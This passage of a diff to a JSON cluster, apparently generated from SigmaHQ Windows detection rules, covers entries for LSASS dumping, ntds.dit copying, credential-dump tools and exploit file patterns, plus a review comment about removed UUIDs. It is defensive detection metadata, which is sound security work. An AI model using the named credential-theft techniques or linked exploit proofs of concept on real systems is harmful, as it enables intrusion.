"attack.t1567.001" + ] + }, + "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + "value": "Communication To Mega.nz" + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "net_connection_win_crypto_mining.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" + ], 
+ "tags": [ + "attack.impact", + "attack.t1496" + ] + }, + "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "value": "Windows Crypto Mining Pool Connections" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate msiexec over networks" + ], + "filename": "net_connection_win_msiexec.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "value": "Msiexec Initiated Connection" + }, + { + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_ntds_dit.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" + "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", + "https://adsecurity.org/?p=2398", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" ], 
"tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ] }, - "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "value": "Suspicious Binary Writes Via AnyDesk" + "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", + "value": "Suspicious Process Writes Ntds.dit" + }, + { + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Subhash P (@pbssubhash)", + "creation_date": "2022/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/binderlabs/DirCreate2System", + "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "07a99744-56ac-40d2-97b7-2095967b0e03", + "value": "Potential Privilege Escalation Attempt Via .Exe.Local Technique" + }, + { + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "meta": { + "author": "Nasreddine Bencherchali, frack113", + "creation_date": "2022/11/07", + "falsepositive": [ + "Users creating a shortcut on e.g. 
desktop" + ], + "filename": "file_event_win_susp_lnk_double_extension.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ] + }, + "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", + "value": "Suspicious LNK Double Extension Files" + }, + { + "description": "Ransomware create txt file in the user Desktop", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_desktop_txt.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "value": "Suspicious Creation TXT File in User Desktop" + }, + { + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": 
"file_event_win_hktl_nppspy.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", + "https://twitter.com/0gtweet/status/1465282548494487554", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "value": "NPPSpy Hacktool Usage" + }, + { + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "meta": { + "author": "frack113", + "creation_date": "2022/06/08", + "falsepositive": [ + "Legitimate microsoft diagcab" + ], + "filename": "file_event_win_susp_diagcab.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threadreaderapp.com/thread/1533879688141086720.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" + ], + "tags": [ + "attack.resource_development" + ] + }, + "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a", + "value": "Creation of a Diagcab" }, { "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", 
@@ -22175,284 +24246,81 @@ "value": "Unidentified Attacker November 2018 - File" }, { - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", "meta": { - "author": "C.J. May", - "creation_date": "2022/08/09", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", "falsepositive": [ - "Unknown" + "Legitimate use of the profile by developers or administrators" ], - "filename": "file_event_win_bloodhound_collection.yml", + "filename": "file_event_win_susp_vscode_powershell_profile.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" ], "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ] }, - "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "value": "BloodHound Collection Files" + "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", + "value": "VsCode Powershell Profile Modification" }, { - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary 
folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + ], + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ] + }, + "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", + "value": "Suspicious PROCEXP152.sys File Created In TMP" + }, + { + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", "meta": { "author": "Florian Roth", - "creation_date": "2022/03/12", + "creation_date": "2021/11/15", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_crackmapexec_patterns.yml", + "filename": "file_event_win_lsass_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml" + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + 
"https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://github.com/helpsystems/nanodump", + "https://www.google.com/search?q=procdump+lsass", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" ], "tags": [ "attack.credential_access", "attack.t1003.001" ] }, - "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "value": "CrackMapExec File Creation Patterns" - }, - { - "description": "Detects the creation of system dlls that are not present on the system. Usualy to achieve dll hijacking", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/01", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_create_non_existent_dlls.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", - "value": "Creation Of Non-Existent DLLs In System Folders" - }, - { - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "meta": { - "author": "frack113", - "creation_date": 
"2021/12/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_creation_new_shim_database.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ] - }, - "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "value": "New Shim Database Created in the Default Directory" - }, - { - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_creation_scr_binary_file.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.002" - ] - }, - "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", - "value": "Suspicious Screensaver Binary File Creation" - }, - { - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "meta": { - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", - "creation_date": 
"2020/05/26", - "falsepositive": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" - ], - "filename": "file_event_win_creation_system_file.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", - "value": "Files With System Process Name In Unsuspected Locations" - }, - { - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_creation_unquoted_service_path.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ] - }, - "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", - "value": "Creation Exe for Service with Unquoted Path" - }, - { - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/11/01", - "falsepositive": [ - 
"Legitimate Administrator using tool for password recovery" - ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ] - }, - "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "value": "Cred Dump Tools Dropped Files" - }, - { - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "meta": { - "author": "Tim Shelton", - "creation_date": "2022/01/10", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_cscript_wscript_dropper.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" - ], - "tags": "No established tags" - }, - "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "value": "WScript or CScript Dropper - File" - }, - { - "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/09", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_csharp_compile_artefact.yml", - "level": "low", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ] - }, - "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", - "value": "Dynamic C Sharp Compile Artefact" - }, - { - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/afwu/PrintNightmare", - "https://github.com/cube0x0/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" - ] - }, - "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern" + "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "value": "LSASS Process Memory Dump Files" }, { "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", 
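Review bot: The new side of this hunk (header `-22175,284 +24246,81`) drops eleven complete cluster entries that carry stable UUIDs — among them `02773bed-83bf-469f-b7ff-e676e7d78bab` (BloodHound Collection Files), `9433ff9c-5d3f-4269-99f8-95fc826ea489` (CrackMapExec File Creation Patterns) and `2131cfb3-8c12-45e8-8fa0-31f5924e9f07` (CVE-2021-1675 Print Spooler Exploitation Filename Pattern) — while adding only three; if those UUIDs are not re-added elsewhere in the patch, any MISP event already tagged with them loses its galaxy reference, and if they are merely moved, the generator should emit entries in a stable order (sorted by `uuid` or `filename`) so a regeneration diff shows only real content changes. Presumably this is a rebuild of the cluster from the SigmaHQ tree rather than a deliberate removal, but nothing in the visible record says so, and a one-line note in the commit description would settle it. Separately, the added `LSASS Process Memory Dump Files` entry carries `https://www.google.com/search?q=procdump+lsass` in `refs`, which is a search query rather than a citable source; the generator could filter search-engine URLs out of `refs`, or the reference could be replaced upstream with a direct one. The enclosing JSON array starts and ends outside this hunk.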
@@ -22480,108 +24348,200 @@
 "value": "CVE-2021-26858 Exchange Exploitation"
 },
 {
- "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum",
+ "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory",
 "meta": {
- "author": "Sittikorn S",
- "creation_date": "2021/07/16",
+ "author": "Florian Roth",
+ "creation_date": "2020/02/04",
 "falsepositive": [
- "Unlikely"
+ "Very unlikely"
 ],
- "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml",
+ "filename": "file_event_win_hack_dumpert.yml",
 "level": "critical",
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
- "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml"
+ "https://github.com/outflanknl/Dumpert",
+ "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml"
 ],
 "tags": [
 "attack.credential_access",
- "attack.t1566",
- "attack.t1203",
- "cve.2021.33771",
- "cve.2021.31979"
+ "attack.t1003.001"
 ]
 },
- "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef",
- "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum"
+ "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8",
+ "value": "Dumpert Process Dumper Default File"
 },
 {
- "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file",
+ "description": "Detects default PsExec 
service installation and execution",
 "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/11/22",
- "falsepositive": [
- "Unknown",
- "Possibly some Microsoft Edge upgrades"
- ],
- "filename": "file_event_win_cve_2021_41379_msi_lpe.yml",
- "level": "critical",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/klinix5/InstallerFileTakeOver",
- "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068"
- ]
- },
- "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324",
- "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event"
- },
- {
- "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/06/06",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "file_event_win_cve_2021_44077_poc_default_files.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
- "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml"
- ],
- "tags": [
- "attack.execution",
- "cve.2021.44077"
- ]
- },
- "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3",
- "value": "CVE-2021-44077 POC Default Dropped File"
- },
- {
- "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache",
- "meta": {
- "author": "Florian Roth",
- 
"creation_date": "2022/04/13",
+ "author": "Thomas Patzke",
+ "creation_date": "2017/06/12",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "file_event_win_cve_2022_24527_lpe.yml",
+ "filename": "file_event_win_tool_psexec.yml",
+ "level": "low",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1569.002",
+ "attack.s0029"
+ ]
+ },
+ "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d",
+ "value": "PsExec Service File Creation"
+ },
+ {
+ "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/05",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml",
 "level": "high",
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml"
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml"
 ],
 "tags": [
- "attack.privilege_escalation",
- "attack.t1059.001",
- "cve.2022.24527"
+ "attack.defense_evasion",
+ "attack.execution"
 ]
 },
- "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7",
- "value": "CVE-2022-24527 Microsoft Connected Cache LPE"
+ "uuid": 
"d7b50671-d1ad-4871-aa60-5aa5b331fe04",
+ "value": "Creation Suspicious File In Uncommon AppData Folder"
+ },
+ {
+ "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.",
+ "meta": {
+ "author": "Nasreddine Bencherchali, frack113",
+ "creation_date": "2022/06/19",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "file_event_win_susp_double_extension.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
+ "https://twitter.com/malwrhunterteam/status/1235135745611960321",
+ "https://twitter.com/luc4m/status/1073181154126254080",
+ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.007"
+ ]
+ },
+ "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e",
+ "value": "Suspicious Double Extension Files"
+ },
+ {
+ "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder",
+ "meta": {
+ "author": "elhoim",
+ "creation_date": "2022/04/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_susp_default_gpo_dir_write.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml"
+ ],
+ "tags": [
+ "attack.t1036.005",
+ "attack.defense_evasion"
+ ]
+ },
+ 
"uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60",
+ "value": "Suspicious Files in Default GPO Folder"
+ },
+ {
+ "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/30",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_creation_unquoted_service_path.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.009"
+ ]
+ },
+ "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9",
+ "value": "Creation Exe for Service with Unquoted Path"
+ },
+ {
+ "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/02/13",
+ "falsepositive": [
+ "Legitimate use"
+ ],
+ "filename": "file_event_win_gotoopener_artefact.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
